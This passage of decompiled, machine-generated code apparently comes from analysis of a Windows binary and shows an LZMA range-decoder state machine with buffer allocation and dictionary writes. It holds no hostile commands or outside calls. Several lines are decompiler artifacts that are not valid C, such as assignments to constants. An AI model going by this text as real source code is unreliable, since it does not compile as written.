                                                                                  							L17:
                                                                                  							__eflags = _v76 - 4;
                                                                                  							if(_v76 < 4) {
                                                                                  								goto L15;
                                                                                  							}
                                                                                  							_t550 = _v68;
                                                                                  							__eflags = _t550 - _v120;
                                                                                  							if(_t550 == _v120) {
                                                                                  								L22:
                                                                                  								_v76 = 5;
                                                                                  								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                                                  								goto L25;
                                                                                  							}
                                                                                  							__eflags = _v12;
                                                                                  							_v120 = _t550;
                                                                                  							if(_v12 != 0) {
                                                                                  								GlobalFree(_v12);
                                                                                  							}
                                                                                  							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                                                  							__eflags = _t537;
                                                                                  							_v12 = _t537;
                                                                                  							if(_t537 == 0) {
                                                                                  								goto L174;
                                                                                  							} else {
                                                                                  								goto L22;
                                                                                  							}
                                                                                  						case 2:
                                                                                  							L26:
                                                                                  							_t557 = _v100 & _v32;
                                                                                  							_v136 = 6;
                                                                                  							_v80 = _t557;
                                                                                  							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                                                  							goto L135;
                                                                                  						case 3:
                                                                                  							L23:
                                                                                  							__eflags = _v112;
                                                                                  							if(_v112 == 0) {
                                                                                  								_v140 = 3;
                                                                                  								goto L173;
                                                                                  							}
                                                                                  							_v112 = _v112 - 1;
                                                                                  							_t72 =  &_v116;
                                                                                  							 *_t72 = _v116 + 1;
                                                                                  							__eflags =  *_t72;
                                                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                  							L25:
                                                                                  							_v76 = _v76 - 1;
                                                                                  							__eflags = _v76;
                                                                                  							if(_v76 != 0) {
                                                                                  								goto L23;
                                                                                  							}
                                                                                  							goto L26;
                                                                                  						case 4:
                                                                                  							L136:
                                                                                  							_t559 =  *_t626;
                                                                                  							_t610 = _t559 & 0x0000ffff;
                                                                                  							_t591 = (_v20 >> 0xb) * _t610;
                                                                                  							__eflags = _v16 - _t591;
                                                                                  							if(_v16 >= _t591) {
                                                                                  								_v20 = _v20 - _t591;
                                                                                  								_v16 = _v16 - _t591;
                                                                                  								_v68 = 1;
                                                                                  								_t560 = _t559 - (_t559 >> 5);
                                                                                  								__eflags = _t560;
                                                                                  								 *_t626 = _t560;
                                                                                  							} else {
                                                                                  								_v20 = _t591;
                                                                                  								_v68 = _v68 & 0x00000000;
                                                                                  								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                                                  							}
                                                                                  							__eflags = _v20 - 0x1000000;
                                                                                  							if(_v20 >= 0x1000000) {
                                                                                  								goto L142;
                                                                                  							} else {
                                                                                  								goto L140;
                                                                                  							}
                                                                                  						case 5:
                                                                                  							L140:
                                                                                  							__eflags = _v112;
                                                                                  							if(_v112 == 0) {
                                                                                  								_v140 = 5;
                                                                                  								goto L173;
                                                                                  							}
                                                                                  							_v20 = _v20 << 8;
                                                                                  							_v112 = _v112 - 1;
                                                                                  							_t464 =  &_v116;
                                                                                  							 *_t464 = _v116 + 1;
                                                                                  							__eflags =  *_t464;
                                                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                  							L142:
                                                                                  							_t561 = _v136;
                                                                                  							goto L143;
                                                                                  						case 6:
                                                                                  							__edx = 0;
                                                                                  							__eflags = _v68;
                                                                                  							if(_v68 != 0) {
                                                                                  								__eax = _v8;
                                                                                  								__ecx = _v60;
                                                                                  								_v56 = 1;
                                                                                  								_v136 = 7;
                                                                                  								__esi = _v8 + 0x180 + _v60 * 2;
                                                                                  								goto L135;
                                                                                  							}
                                                                                  							__eax = _v96 & 0x000000ff;
                                                                                  							__esi = _v100;
                                                                                  							__cl = 8;
                                                                                  							__cl = 8 - _v64;
                                                                                  							__esi = _v100 & _v28;
                                                                                  							__eax = (_v96 & 0x000000ff) >> 8;
                                                                                  							__ecx = _v64;
                                                                                  							__esi = (_v100 & _v28) << 8;
                                                                                  							__ecx = _v8;
                                                                                  							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                                                  							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                                                  							__eflags = _v60 - 4;
                                                                                  							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                                  							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                                  							if(_v60 >= 4) {
                                                                                  								__eflags = _v60 - 0xa;
                                                                                  								if(_v60 >= 0xa) {
                                                                                  									_t103 =  &_v60;
                                                                                  									 *_t103 = _v60 - 6;
                                                                                  									__eflags =  *_t103;
                                                                                  								} else {
                                                                                  									_v60 = _v60 - 3;
                                                                                  								}
                                                                                  							} else {
                                                                                  								_v60 = 0;
                                                                                  							}
                                                                                  							__eflags = _v56 - __edx;
                                                                                  							if(_v56 == __edx) {
                                                                                  								__ebx = 0;
                                                                                  								__ebx = 1;
                                                                                  								goto L63;
                                                                                  							}
                                                                                  							__eax = _v24;
                                                                                  							__eax = _v24 - _v48;
                                                                                  							__eflags = __eax - _v120;
                                                                                  							if(__eax >= _v120) {
                                                                                  								__eax = __eax + _v120;
                                                                                  								__eflags = __eax;
                                                                                  							}
                                                                                  							__ecx = _v12;
                                                                                  							__ebx = 0;
                                                                                  							__ebx = 1;
                                                                                  							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                  							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                                                  							goto L43;
                                                                                  						case 7:
                                                                                  							__eflags = _v68 - 1;
                                                                                  							if(_v68 != 1) {
                                                                                  								__eax = _v40;
                                                                                  								_v132 = 0x16;
                                                                                  								_v36 = _v40;
                                                                                  								__eax = _v44;
                                                                                  								_v40 = _v44;
                                                                                  								__eax = _v48;
                                                                                  								_v44 = _v48;
                                                                                  								__eax = 0;
                                                                                  								__eflags = _v60 - 7;
                                                                                  								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                  								__al = __al & 0x000000fd;
                                                                                  								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                  								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                                                  								__eax = _v8;
                                                                                  								__eax = _v8 + 0x664;
                                                                                  								__eflags = __eax;
                                                                                  								_v92 = __eax;
                                                                                  								goto L71;
                                                                                  							}
                                                                                  							__eax = _v8;
                                                                                  							__ecx = _v60;
                                                                                  							_v136 = 8;
                                                                                  							__esi = _v8 + 0x198 + _v60 * 2;
                                                                                  							goto L135;
                                                                                  						case 8:
                                                                                  							__eflags = _v68;
                                                                                  							if(_v68 != 0) {
                                                                                  								__eax = _v8;
                                                                                  								__ecx = _v60;
                                                                                  								_v136 = 0xa;
                                                                                  								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                                                  							} else {
                                                                                  								__eax = _v60;
                                                                                  								__ecx = _v8;
                                                                                  								__eax = _v60 + 0xf;
                                                                                  								_v136 = 9;
                                                                                  								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                                                  								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                                                  							}
                                                                                  							goto L135;
                                                                                  						case 9:
                                                                                  							__eflags = _v68;
                                                                                  							if(_v68 != 0) {
                                                                                  								goto L92;
                                                                                  							}
                                                                                  							__eflags = _v100;
                                                                                  							if(_v100 == 0) {
                                                                                  								goto L174;
                                                                                  							}
                                                                                  							__eax = 0;
                                                                                  							__eflags = _v60 - 7;
                                                                                  							_t264 = _v60 - 7 >= 0;
                                                                                  							__eflags = _t264;
                                                                                  							0 | _t264 = _t264 + _t264 + 9;
                                                                                  							_v60 = _t264 + _t264 + 9;
                                                                                  							goto L78;
                                                                                  						case 0xa:
                                                                                  							__eflags = _v68;
                                                                                  							if(_v68 != 0) {
                                                                                  								__eax = _v8;
                                                                                  								__ecx = _v60;
                                                                                  								_v136 = 0xb;
                                                                                  								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                                                  								goto L135;
                                                                                  							}
                                                                                  							__eax = _v44;
                                                                                  							goto L91;
                                                                                  						case 0xb:
                                                                                  							__eflags = _v68;
                                                                                  							if(_v68 != 0) {
                                                                                  								__ecx = _v40;
                                                                                  								__eax = _v36;
                                                                                  								_v36 = _v40;
                                                                                  							} else {
                                                                                  								__eax = _v40;
                                                                                  							}
                                                                                  							__ecx = _v44;
                                                                                  							_v40 = _v44;
                                                                                  							L91:
                                                                                  							__ecx = _v48;
                                                                                  							_v48 = __eax;
                                                                                  							_v44 = _v48;
                                                                                  							L92:
                                                                                  							__eax = _v8;
                                                                                  							_v132 = 0x15;
                                                                                  							__eax = _v8 + 0xa68;
                                                                                  							_v92 = _v8 + 0xa68;
                                                                                  							goto L71;
                                                                                  						case 0xc:
                                                                                  							L102:
                                                                                  							__eflags = _v112;
                                                                                  							if(_v112 == 0) {
                                                                                  								_v140 = 0xc;
                                                                                  								goto L173;
                                                                                  							}
                                                                                  							__ecx = _v116;
                                                                                  							__eax = _v16;
                                                                                  							_v20 = _v20 << 8;
                                                                                  							__ecx =  *_v116 & 0x000000ff;
                                                                                  							_v112 = _v112 - 1;
                                                                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                  							_t340 =  &_v116;
                                                                                  							 *_t340 = _v116 + 1;
                                                                                  							__eflags =  *_t340;
                                                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                  							__eax = _v48;
                                                                                  							goto L104;
                                                                                  						case 0xd:
                                                                                  							L39:
                                                                                  							__eflags = _v112;
                                                                                  							if(_v112 == 0) {
                                                                                  								_v140 = 0xd;
                                                                                  								goto L173;
                                                                                  							}
                                                                                  							__ecx = _v116;
                                                                                  							__eax = _v16;
                                                                                  							_v20 = _v20 << 8;
                                                                                  							__ecx =  *_v116 & 0x000000ff;
                                                                                  							_v112 = _v112 - 1;
                                                                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                  							_t127 =  &_v116;
                                                                                  							 *_t127 = _v116 + 1;
                                                                                  							__eflags =  *_t127;
                                                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                  							L41:
                                                                                  							__eax = _v68;
                                                                                  							__eflags = _v76 - _v68;
                                                                                  							if(_v76 != _v68) {
                                                                                  								goto L50;
                                                                                  							}
                                                                                  							__eflags = __ebx - 0x100;
                                                                                  							if(__ebx >= 0x100) {
                                                                                  								goto L56;
                                                                                  							}
                                                                                  							L43:
                                                                                  							__eax = _v95 & 0x000000ff;
                                                                                  							_v95 = _v95 << 1;
                                                                                  							__ecx = _v92;
                                                                                  							__eax = (_v95 & 0x000000ff) >> 7;
                                                                                  							_v76 = __eax;
                                                                                  							__eax = __eax + 1;
                                                                                  							__eax = __eax << 8;
                                                                                  							__eax = __eax + __ebx;
                                                                                  							__esi = _v92 + __eax * 2;
                                                                                  							_v20 = _v20 >> 0xb;
                                                                                  							__ax =  *__esi;
                                                                                  							_v88 = __esi;
                                                                                  							__edx = __ax & 0x0000ffff;
                                                                                  							__ecx = (_v20 >> 0xb) * __edx;
                                                                                  							__eflags = _v16 - __ecx;
                                                                                  							if(_v16 >= __ecx) {
                                                                                  								_v20 = _v20 - __ecx;
                                                                                  								_v16 = _v16 - __ecx;
                                                                                  								__cx = __ax;
                                                                                  								_v68 = 1;
                                                                                  								__cx = __ax >> 5;
                                                                                  								__eflags = __eax;
                                                                                  								__ebx = __ebx + __ebx + 1;
                                                                                  								 *__esi = __ax;
                                                                                  							} else {
                                                                                  								_v68 = _v68 & 0x00000000;
                                                                                  								_v20 = __ecx;
                                                                                  								0x800 = 0x800 - __edx;
                                                                                  								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                  								__ebx = __ebx + __ebx;
                                                                                  								 *__esi = __cx;
                                                                                  							}
                                                                                  							__eflags = _v20 - 0x1000000;
                                                                                  							_v72 = __ebx;
                                                                                  							if(_v20 >= 0x1000000) {
                                                                                  								goto L41;
                                                                                  							} else {
                                                                                  								goto L39;
                                                                                  							}
                                                                                  						case 0xe:
                                                                                  							L48:
                                                                                  							__eflags = _v112;
                                                                                  							if(_v112 == 0) {
                                                                                  								_v140 = 0xe;
                                                                                  								goto L173;
                                                                                  							}
                                                                                  							__ecx = _v116;
                                                                                  							__eax = _v16;
                                                                                  							_v20 = _v20 << 8;
                                                                                  							__ecx =  *_v116 & 0x000000ff;
                                                                                  							_v112 = _v112 - 1;
                                                                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                  							_t161 =  &_v116;
                                                                                  							 *_t161 = _v116 + 1;
                                                                                  							__eflags =  *_t161;
                                                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                  							while(1) {
                                                                                  								L50:
                                                                                  								__eflags = __ebx - 0x100;
                                                                                  								if(__ebx >= 0x100) {
                                                                                  									break;
                                                                                  								}
                                                                                  								__eax = _v92;
                                                                                  								__edx = __ebx + __ebx;
                                                                                  								__ecx = _v20;
                                                                                  								__esi = __edx + __eax;
                                                                                  								__ecx = _v20 >> 0xb;
                                                                                  								__ax =  *__esi;
                                                                                  								_v88 = __esi;
                                                                                  								__edi = __ax & 0x0000ffff;
                                                                                  								__ecx = (_v20 >> 0xb) * __edi;
                                                                                  								__eflags = _v16 - __ecx;
                                                                                  								if(_v16 >= __ecx) {
                                                                                  									_v20 = _v20 - __ecx;
                                                                                  									_v16 = _v16 - __ecx;
                                                                                  									__cx = __ax;
                                                                                  									_t175 = __edx + 1; // 0x1
                                                                                  									__ebx = _t175;
                                                                                  									__cx = __ax >> 5;
                                                                                  									__eflags = __eax;
                                                                                  									 *__esi = __ax;
                                                                                  								} else {
                                                                                  									_v20 = __ecx;
                                                                                  									0x800 = 0x800 - __edi;
                                                                                  									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                  									__ebx = __ebx + __ebx;
                                                                                  									 *__esi = __cx;
                                                                                  								}
                                                                                  								__eflags = _v20 - 0x1000000;
                                                                                  								_v72 = __ebx;
                                                                                  								if(_v20 >= 0x1000000) {
                                                                                  									continue;
                                                                                  								} else {
                                                                                  									goto L48;
                                                                                  								}
                                                                                  							}
                                                                                  							L56:
                                                                                  							_t178 =  &_v56;
                                                                                  							 *_t178 = _v56 & 0x00000000;
                                                                                  							__eflags =  *_t178;
                                                                                  							goto L57;
                                                                                  						case 0xf:
                                                                                  							L60:
                                                                                  							__eflags = _v112;
                                                                                  							if(_v112 == 0) {
                                                                                  								_v140 = 0xf;
                                                                                  								goto L173;
                                                                                  							}
                                                                                  							__ecx = _v116;
                                                                                  							__eax = _v16;
                                                                                  							_v20 = _v20 << 8;
                                                                                  							__ecx =  *_v116 & 0x000000ff;
                                                                                  							_v112 = _v112 - 1;
                                                                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                  							_t208 =  &_v116;
                                                                                  							 *_t208 = _v116 + 1;
                                                                                  							__eflags =  *_t208;
                                                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                  							L62:
                                                                                  							__eflags = __ebx - 0x100;
                                                                                  							if(__ebx >= 0x100) {
                                                                                  								L57:
                                                                                  								__al = _v72;
                                                                                  								_v96 = _v72;
                                                                                  								goto L58;
                                                                                  							}
                                                                                  							L63:
                                                                                  							__eax = _v92;
                                                                                  							__edx = __ebx + __ebx;
                                                                                  							__ecx = _v20;
                                                                                  							__esi = __edx + __eax;
                                                                                  							__ecx = _v20 >> 0xb;
                                                                                  							__ax =  *__esi;
                                                                                  							_v88 = __esi;
                                                                                  							__edi = __ax & 0x0000ffff;
                                                                                  							__ecx = (_v20 >> 0xb) * __edi;
                                                                                  							__eflags = _v16 - __ecx;
                                                                                  							if(_v16 >= __ecx) {
                                                                                  								_v20 = _v20 - __ecx;
                                                                                  								_v16 = _v16 - __ecx;
                                                                                  								__cx = __ax;
                                                                                  								_t222 = __edx + 1; // 0x1
                                                                                  								__ebx = _t222;
                                                                                  								__cx = __ax >> 5;
                                                                                  								__eflags = __eax;
                                                                                  								 *__esi = __ax;
                                                                                  							} else {
                                                                                  								_v20 = __ecx;
                                                                                  								0x800 = 0x800 - __edi;
                                                                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                  								__ebx = __ebx + __ebx;
                                                                                  								 *__esi = __cx;
                                                                                  							}
                                                                                  							__eflags = _v20 - 0x1000000;
                                                                                  							_v72 = __ebx;
                                                                                  							if(_v20 >= 0x1000000) {
                                                                                  								goto L62;
                                                                                  							} else {
                                                                                  								goto L60;
                                                                                  							}
                                                                                  						case 0x10:
                                                                                  							L112:
                                                                                  							__eflags = _v112;
                                                                                  							if(_v112 == 0) {
                                                                                  								_v140 = 0x10;
                                                                                  								goto L173;
                                                                                  							}
                                                                                  							__ecx = _v116;
                                                                                  							__eax = _v16;
                                                                                  							_v20 = _v20 << 8;
                                                                                  							__ecx =  *_v116 & 0x000000ff;
                                                                                  							_v112 = _v112 - 1;
                                                                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                  							_t371 =  &_v116;
                                                                                  							 *_t371 = _v116 + 1;
                                                                                  							__eflags =  *_t371;
                                                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                  							goto L114;
                                                                                  						case 0x11:
                                                                                  							L71:
                                                                                  							__esi = _v92;
                                                                                  							_v136 = 0x12;
                                                                                  							goto L135;
                                                                                  						case 0x12:
                                                                                  							__eflags = _v68;
                                                                                  							if(_v68 != 0) {
                                                                                  								__eax = _v92;
                                                                                  								_v136 = 0x13;
                                                                                  								__esi = _v92 + 2;
                                                                                  								L135:
                                                                                  								_v88 = _t626;
                                                                                  								goto L136;
                                                                                  							}
                                                                                  							__eax = _v80;
                                                                                  							_v52 = _v52 & 0x00000000;
                                                                                  							__ecx = _v92;
                                                                                  							__eax = _v80 << 4;
                                                                                  							__eflags = __eax;
                                                                                  							__eax = _v92 + __eax + 4;
                                                                                  							goto L133;
                                                                                  						case 0x13:
                                                                                  							__eflags = _v68;
                                                                                  							if(_v68 != 0) {
                                                                                  								_t475 =  &_v92;
                                                                                  								 *_t475 = _v92 + 0x204;
                                                                                  								__eflags =  *_t475;
                                                                                  								_v52 = 0x10;
                                                                                  								_v68 = 8;
                                                                                  								L147:
                                                                                  								_v128 = 0x14;
                                                                                  								goto L148;
                                                                                  							}
                                                                                  							__eax = _v80;
                                                                                  							__ecx = _v92;
                                                                                  							__eax = _v80 << 4;
                                                                                  							_v52 = 8;
                                                                                  							__eax = _v92 + (_v80 << 4) + 0x104;
                                                                                  							L133:
                                                                                  							_v92 = __eax;
                                                                                  							_v68 = 3;
                                                                                  							goto L147;
                                                                                  						case 0x14:
                                                                                  							_v52 = _v52 + __ebx;
                                                                                  							__eax = _v132;
                                                                                  							goto L143;
                                                                                  						case 0x15:
                                                                                  							__eax = 0;
                                                                                  							__eflags = _v60 - 7;
                                                                                  							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                  							__al = __al & 0x000000fd;
                                                                                  							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                  							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                                                  							goto L123;
                                                                                  						case 0x16:
                                                                                  							__eax = _v52;
                                                                                  							__eflags = __eax - 4;
                                                                                  							if(__eax >= 4) {
                                                                                  								_push(3);
                                                                                  								_pop(__eax);
                                                                                  							}
                                                                                  							__ecx = _v8;
                                                                                  							_v68 = 6;
                                                                                  							__eax = __eax << 7;
                                                                                  							_v128 = 0x19;
                                                                                  							_v92 = __eax;
                                                                                  							goto L148;
                                                                                  						case 0x17:
                                                                                  							L148:
                                                                                  							__eax = _v68;
                                                                                  							_v84 = 1;
                                                                                  							_v76 = _v68;
                                                                                  							goto L152;
                                                                                  						case 0x18:
                                                                                  							L149:
                                                                                  							__eflags = _v112;
                                                                                  							if(_v112 == 0) {
                                                                                  								_v140 = 0x18;
                                                                                  								goto L173;
                                                                                  							}
                                                                                  							__ecx = _v116;
                                                                                  							__eax = _v16;
                                                                                  							_v20 = _v20 << 8;
                                                                                  							__ecx =  *_v116 & 0x000000ff;
                                                                                  							_v112 = _v112 - 1;
                                                                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                  							_t490 =  &_v116;
                                                                                  							 *_t490 = _v116 + 1;
                                                                                  							__eflags =  *_t490;
                                                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                  							L151:
                                                                                  							_t493 =  &_v76;
                                                                                  							 *_t493 = _v76 - 1;
                                                                                  							__eflags =  *_t493;
                                                                                  							L152:
                                                                                  							__eflags = _v76;
                                                                                  							if(_v76 <= 0) {
                                                                                  								__ecx = _v68;
                                                                                  								__ebx = _v84;
                                                                                  								0 = 1;
                                                                                  								__eax = 1 << __cl;
                                                                                  								__ebx = _v84 - (1 << __cl);
                                                                                  								__eax = _v128;
                                                                                  								_v72 = __ebx;
                                                                                  								L143:
                                                                                  								_v140 = _t561;
                                                                                  								goto L3;
                                                                                  							}
                                                                                  							__eax = _v84;
                                                                                  							_v20 = _v20 >> 0xb;
                                                                                  							__edx = _v84 + _v84;
                                                                                  							__eax = _v92;
                                                                                  							__esi = __edx + __eax;
                                                                                  							_v88 = __esi;
                                                                                  							__ax =  *__esi;
                                                                                  							__edi = __ax & 0x0000ffff;
                                                                                  							__ecx = (_v20 >> 0xb) * __edi;
                                                                                  							__eflags = _v16 - __ecx;
                                                                                  							if(_v16 >= __ecx) {
                                                                                  								_v20 = _v20 - __ecx;
                                                                                  								_v16 = _v16 - __ecx;
                                                                                  								__cx = __ax;
                                                                                  								__cx = __ax >> 5;
                                                                                  								__eax = __eax - __ecx;
                                                                                  								__edx = __edx + 1;
                                                                                  								__eflags = __edx;
                                                                                  								 *__esi = __ax;
                                                                                  								_v84 = __edx;
                                                                                  							} else {
                                                                                  								_v20 = __ecx;
                                                                                  								0x800 = 0x800 - __edi;
                                                                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                  								_v84 = _v84 << 1;
                                                                                  								 *__esi = __cx;
                                                                                  							}
                                                                                  							__eflags = _v20 - 0x1000000;
                                                                                  							if(_v20 >= 0x1000000) {
                                                                                  								goto L151;
                                                                                  							} else {
                                                                                  								goto L149;
                                                                                  							}
                                                                                  						case 0x19:
                                                                                  							__eflags = __ebx - 4;
                                                                                  							if(__ebx < 4) {
                                                                                  								_v48 = __ebx;
                                                                                  								L122:
                                                                                  								_t399 =  &_v48;
                                                                                  								 *_t399 = _v48 + 1;
                                                                                  								__eflags =  *_t399;
                                                                                  								L123:
                                                                                  								__eax = _v48;
                                                                                  								__eflags = __eax;
                                                                                  								if(__eax == 0) {
                                                                                  									_v52 = _v52 | 0xffffffff;
                                                                                  									goto L173;
                                                                                  								}
                                                                                  								__eflags = __eax - _v100;
                                                                                  								if(__eax > _v100) {
                                                                                  									goto L174;
                                                                                  								}
                                                                                  								_v52 = _v52 + 2;
                                                                                  								__eax = _v52;
                                                                                  								_t406 =  &_v100;
                                                                                  								 *_t406 = _v100 + _v52;
                                                                                  								__eflags =  *_t406;
                                                                                  								goto L126;
                                                                                  							}
                                                                                  							__ecx = __ebx;
                                                                                  							__eax = __ebx;
                                                                                  							__ecx = __ebx >> 1;
                                                                                  							__eax = __ebx & 0x00000001;
                                                                                  							__ecx = (__ebx >> 1) - 1;
                                                                                  							__al = __al | 0x00000002;
                                                                                  							__eax = (__ebx & 0x00000001) << __cl;
                                                                                  							__eflags = __ebx - 0xe;
                                                                                  							_v48 = __eax;
                                                                                  							if(__ebx >= 0xe) {
                                                                                  								__ebx = 0;
                                                                                  								_v76 = __ecx;
                                                                                  								L105:
                                                                                  								__eflags = _v76;
                                                                                  								if(_v76 <= 0) {
                                                                                  									__eax = __eax + __ebx;
                                                                                  									_v68 = 4;
                                                                                  									_v48 = __eax;
                                                                                  									__eax = _v8;
                                                                                  									__eax = _v8 + 0x644;
                                                                                  									__eflags = __eax;
                                                                                  									L111:
                                                                                  									__ebx = 0;
                                                                                  									_v92 = __eax;
                                                                                  									_v84 = 1;
                                                                                  									_v72 = 0;
                                                                                  									_v76 = 0;
                                                                                  									L115:
                                                                                  									__eax = _v68;
                                                                                  									__eflags = _v76 - _v68;
                                                                                  									if(_v76 >= _v68) {
                                                                                  										_t397 =  &_v48;
                                                                                  										 *_t397 = _v48 + __ebx;
                                                                                  										__eflags =  *_t397;
                                                                                  										goto L122;
                                                                                  									}
                                                                                  									__eax = _v84;
                                                                                  									_v20 = _v20 >> 0xb;
                                                                                  									__edi = _v84 + _v84;
                                                                                  									__eax = _v92;
                                                                                  									__esi = __edi + __eax;
                                                                                  									_v88 = __esi;
                                                                                  									__ax =  *__esi;
                                                                                  									__ecx = __ax & 0x0000ffff;
                                                                                  									__edx = (_v20 >> 0xb) * __ecx;
                                                                                  									__eflags = _v16 - __edx;
                                                                                  									if(_v16 >= __edx) {
                                                                                  										__ecx = 0;
                                                                                  										_v20 = _v20 - __edx;
                                                                                  										__ecx = 1;
                                                                                  										_v16 = _v16 - __edx;
                                                                                  										__ebx = 1;
                                                                                  										__ecx = _v76;
                                                                                  										__ebx = 1 << __cl;
                                                                                  										__ecx = 1 << __cl;
                                                                                  										__ebx = _v72;
                                                                                  										__ebx = _v72 | __ecx;
                                                                                  										__cx = __ax;
                                                                                  										__cx = __ax >> 5;
                                                                                  										__eax = __eax - __ecx;
                                                                                  										__edi = __edi + 1;
                                                                                  										__eflags = __edi;
                                                                                  										_v72 = __ebx;
                                                                                  										 *__esi = __ax;
                                                                                  										_v84 = __edi;
                                                                                  									} else {
                                                                                  										_v20 = __edx;
                                                                                  										0x800 = 0x800 - __ecx;
                                                                                  										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                  										_v84 = _v84 << 1;
                                                                                  										 *__esi = __dx;
                                                                                  									}
                                                                                  									__eflags = _v20 - 0x1000000;
                                                                                  									if(_v20 >= 0x1000000) {
                                                                                  										L114:
                                                                                  										_t374 =  &_v76;
                                                                                  										 *_t374 = _v76 + 1;
                                                                                  										__eflags =  *_t374;
                                                                                  										goto L115;
                                                                                  									} else {
                                                                                  										goto L112;
                                                                                  									}
                                                                                  								}
                                                                                  								__ecx = _v16;
                                                                                  								__ebx = __ebx + __ebx;
                                                                                  								_v20 = _v20 >> 1;
                                                                                  								__eflags = _v16 - _v20;
                                                                                  								_v72 = __ebx;
                                                                                  								if(_v16 >= _v20) {
                                                                                  									__ecx = _v20;
                                                                                  									_v16 = _v16 - _v20;
                                                                                  									__ebx = __ebx | 0x00000001;
                                                                                  									__eflags = __ebx;
                                                                                  									_v72 = __ebx;
                                                                                  								}
                                                                                  								__eflags = _v20 - 0x1000000;
                                                                                  								if(_v20 >= 0x1000000) {
                                                                                  									L104:
                                                                                  									_t344 =  &_v76;
                                                                                  									 *_t344 = _v76 - 1;
                                                                                  									__eflags =  *_t344;
                                                                                  									goto L105;
                                                                                  								} else {
                                                                                  									goto L102;
                                                                                  								}
                                                                                  							}
                                                                                  							__edx = _v8;
                                                                                  							__eax = __eax - __ebx;
                                                                                  							_v68 = __ecx;
                                                                                  							__eax = _v8 + 0x55e + __eax * 2;
                                                                                  							goto L111;
                                                                                  						case 0x1a:
                                                                                  							L58:
                                                                                  							__eflags = _v104;
                                                                                  							if(_v104 == 0) {
                                                                                  								_v140 = 0x1a;
                                                                                  								goto L173;
                                                                                  							}
                                                                                  							__ecx = _v108;
                                                                                  							__al = _v96;
                                                                                  							__edx = _v12;
                                                                                  							_v100 = _v100 + 1;
                                                                                  							_v108 = _v108 + 1;
                                                                                  							_v104 = _v104 - 1;
                                                                                  							 *_v108 = __al;
                                                                                  							__ecx = _v24;
                                                                                  							 *(_v12 + __ecx) = __al;
                                                                                  							__eax = __ecx + 1;
                                                                                  							__edx = 0;
                                                                                  							_t197 = __eax % _v120;
                                                                                  							__eax = __eax / _v120;
                                                                                  							__edx = _t197;
                                                                                  							goto L82;
                                                                                  						case 0x1b:
                                                                                  							L78:
                                                                                  							__eflags = _v104;
                                                                                  							if(_v104 == 0) {
                                                                                  								_v140 = 0x1b;
                                                                                  								goto L173;
                                                                                  							}
                                                                                  							__eax = _v24;
                                                                                  							__eax = _v24 - _v48;
                                                                                  							__eflags = __eax - _v120;
                                                                                  							if(__eax >= _v120) {
                                                                                  								__eax = __eax + _v120;
                                                                                  								__eflags = __eax;
                                                                                  							}
                                                                                  							__edx = _v12;
                                                                                  							__cl =  *(__edx + __eax);
                                                                                  							__eax = _v24;
                                                                                  							_v96 = __cl;
                                                                                  							 *(__edx + __eax) = __cl;
                                                                                  							__eax = __eax + 1;
                                                                                  							__edx = 0;
                                                                                  							_t280 = __eax % _v120;
                                                                                  							__eax = __eax / _v120;
                                                                                  							__edx = _t280;
                                                                                  							__eax = _v108;
                                                                                  							_v100 = _v100 + 1;
                                                                                  							_v108 = _v108 + 1;
                                                                                  							_t289 =  &_v104;
                                                                                  							 *_t289 = _v104 - 1;
                                                                                  							__eflags =  *_t289;
                                                                                  							 *_v108 = __cl;
                                                                                  							L82:
